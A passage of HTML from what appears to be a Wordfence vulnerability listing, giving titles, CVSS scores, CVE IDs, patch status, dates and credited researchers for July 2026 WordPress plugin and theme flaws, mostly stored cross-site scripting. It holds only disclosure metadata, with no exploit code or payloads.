<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mike-montoya" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ab8bce3194dc26afaa5edaf1990620ee.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ab8bce3194dc26afaa5edaf1990620ee"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mike-montoya" target="_blank" rel="noopener">Mike Montoya</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9e2cc3b5-8eb7-42ef-be25-f778560b6e58" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c394c9bc-21f6-45ea-8eda-8ee22a9b87ba" target="_blank" rel="noopener">Header Footer Script Adder &lt;= 2.1 &#8211; Authenticated (Author+) Stored Cross-Site Scripting via &#8216;asm_code&#8217; Snippet Meta</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15394" target="_blank" rel="noopener noreferrer">							CVE-2026-15394						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/header-and-footer-script-adder" target="_blank" rel="noopener">Header Footer Script Adder</a> <span class="wfvr-software-slug">[header-and-footer-script-adder]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c394c9bc-21f6-45ea-8eda-8ee22a9b87ba" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4cebd997-4bfb-46f2-9670-0ab8e40f632b" target="_blank" rel="noopener">Hubbub Lite &lt;= 1.36.3 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-27403" target="_blank" rel="noopener noreferrer">							CVE-2026-27403						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/social-pug" target="_blank" rel="noopener">Hubbub Lite – Fast, free social sharing and follow buttons</a> <span class="wfvr-software-slug">[social-pug]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/zaim" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4c2bd6964b38518385c4e8d1791fd762.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4c2bd6964b38518385c4e8d1791fd762"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/zaim" target="_blank" rel="noopener">zaim</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4cebd997-4bfb-46f2-9670-0ab8e40f632b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/63a3fc17-8a1e-4791-9d5a-33080112b633" target="_blank" rel="noopener">JetElements &lt;= 2.9.1.1 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65465" target="_blank" rel="noopener noreferrer">							CVE-2026-65465						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jet-elements" target="_blank" rel="noopener">JetElements</a> <span class="wfvr-software-slug">[jet-elements]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/63a3fc17-8a1e-4791-9d5a-33080112b633" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/85c7af8b-31d4-4672-a857-da0e39c1c803" target="_blank" rel="noopener">JetEngine &lt;= 3.8.11 &#8211; Authenticated (Contributor+) Sever-Side Request Forgery</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65467" target="_blank" rel="noopener noreferrer">							CVE-2026-65467						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jet-engine" target="_blank" rel="noopener">JetEngine</a> <span class="wfvr-software-slug">[jet-engine]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/85c7af8b-31d4-4672-a857-da0e39c1c803" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/130fbb1c-3fc8-4eb0-8f29-6632e413f24c" target="_blank" rel="noopener">LA-Studio Element Kit for Elementor &lt;= 1.6.2 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65482" target="_blank" rel="noopener noreferrer">							CVE-2026-65482						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/lastudio-element-kit" target="_blank" rel="noopener">LA-Studio Element Kit for Elementor</a> <span class="wfvr-software-slug">[lastudio-element-kit]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abu-hurayra" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/5eb53283536a9b8ccb42a5ce5161b505.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5eb53283536a9b8ccb42a5ce5161b505"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abu-hurayra" target="_blank" rel="noopener">Abu Hurayra</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/130fbb1c-3fc8-4eb0-8f29-6632e413f24c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/705f5adc-4be5-49bf-8244-f8b459d99c69" target="_blank" rel="noopener">LIQUID SPEECH BALLOON &lt;= 1.2.5 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65527" target="_blank" rel="noopener noreferrer">							CVE-2026-65527						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/liquid-speech-balloon" target="_blank" rel="noopener">LIQUID SPEECH BALLOON</a> <span class="wfvr-software-slug">[liquid-speech-balloon]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/705f5adc-4be5-49bf-8244-f8b459d99c69" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fa43a647-9c54-4838-aeb6-7e4b89d6bf03" target="_blank" rel="noopener">Machete &lt;= 5.2 &#8211; Authenticated (Author+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65538" target="_blank" rel="noopener noreferrer">							CVE-2026-65538						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/machete" target="_blank" rel="noopener">Machete</a> <span class="wfvr-software-slug">[machete]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fa43a647-9c54-4838-aeb6-7e4b89d6bf03" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2b1b21f4-2130-4b43-bf0b-cb8217770e72" target="_blank" rel="noopener">Manual &#8211; Documentation, Knowledge Base &amp; Education WordPress &lt;= 7.5.4 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65522" target="_blank" rel="noopener noreferrer">							CVE-2026-65522						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/manual" target="_blank" rel="noopener">Manual &#8211; Documentation, Knowledge Base &amp; Education WordPress Theme</a> <span class="wfvr-software-slug">[manual]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ed32dll" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ed32dll" target="_blank" rel="noopener">ed32.dll</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2b1b21f4-2130-4b43-bf0b-cb8217770e72" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7cca8164-c0ce-4c10-aeb2-5ba7983e4e81" target="_blank" rel="noopener">MapSVG – Vector maps, Image maps, Google Maps &lt;= 8.14.0 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65449" target="_blank" rel="noopener noreferrer">							CVE-2026-65449						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mapsvg-lite-interactive-vector-maps" target="_blank" rel="noopener">MapSVG – Vector maps, Image maps, Google Maps</a> <span class="wfvr-software-slug">[mapsvg-lite-interactive-vector-maps]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/johska" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/343456e443c863409724aa97bcfa6e3e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="343456e443c863409724aa97bcfa6e3e"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/johska" target="_blank" rel="noopener">johska</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7cca8164-c0ce-4c10-aeb2-5ba7983e4e81" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a2dab9d3-a890-4c66-a825-e30329e37a60" target="_blank" rel="noopener">MapSVG Lite &lt;= 8.14.0 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2025-9205" target="_blank" rel="noopener noreferrer">							CVE-2025-9205						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mapsvg-lite-interactive-vector-maps" target="_blank" rel="noopener">MapSVG – Vector maps, Image maps, Google Maps</a> <span class="wfvr-software-slug">[mapsvg-lite-interactive-vector-maps]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/zer0gh0st" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/a964068aac6d7229783a0ea643877251.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="a964068aac6d7229783a0ea643877251"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/zer0gh0st" target="_blank" rel="noopener">zer0gh0st</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a2dab9d3-a890-4c66-a825-e30329e37a60" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/77c4515f-bab7-4bb9-bbf6-ca0ee557055d" target="_blank" rel="noopener">Masteriyo LMS – LMS Course Builder, Quizzes &amp; Certificates &lt;= 2.3.0 &#8211; Authenticated (Subscriber+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-59513" target="_blank" rel="noopener noreferrer">							CVE-2026-59513						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learning-management-system" target="_blank" rel="noopener">Masteriyo LMS – LMS Course Builder, Quizzes &amp; Certificates</a> <span class="wfvr-software-slug">[learning-management-system]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
									<strong>Researcher(s):</strong> Unknown
							</div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/77c4515f-bab7-4bb9-bbf6-ca0ee557055d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4af762d6-bc93-4724-b27d-4873a8bb4f38" target="_blank" rel="noopener">miniOrange Social Login and Register (Discord, Google, Twitter, LinkedIn) &lt;= 7.8.0 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65561" target="_blank" rel="noopener noreferrer">							CVE-2026-65561						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/miniorange-login-openid-2" target="_blank" rel="noopener">miniOrange Social Login and Register (Discord, Google, Twitter, LinkedIn) Pro Addon</a> <span class="wfvr-software-slug">[miniorange-login-openid]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4af762d6-bc93-4724-b27d-4873a8bb4f38" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/063011d3-d744-46a7-9069-89e3a8f843f3" target="_blank" rel="noopener">Modula Image Gallery – Photo Grid &amp; Video Gallery  2.14.25-2.14.30 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65475" target="_blank" rel="noopener noreferrer">							CVE-2026-65475						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/modula-best-grid-gallery" target="_blank" rel="noopener">Modula Image Gallery – Photo Grid &amp; Video Gallery</a> <span class="wfvr-software-slug">[modula-best-grid-gallery]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abdullah-kareem-cyberkareem" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4f2a3b32ba525d9a6cd33a222b91f5ec.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4f2a3b32ba525d9a6cd33a222b91f5ec"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abdullah-kareem-cyberkareem" target="_blank" rel="noopener">Abdullah Kareem &#8220;cyberkareem&#8221;</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/063011d3-d744-46a7-9069-89e3a8f843f3" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2bcc2783-1c47-47e4-ba63-822012aba0a6" target="_blank" rel="noopener">Open User Map &lt;= 1.4.45 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15755" target="_blank" rel="noopener noreferrer">							CVE-2026-15755						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/open-user-map" target="_blank" rel="noopener">Open User Map – Interactive Leaflet Maps</a> <span class="wfvr-software-slug">[open-user-map]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
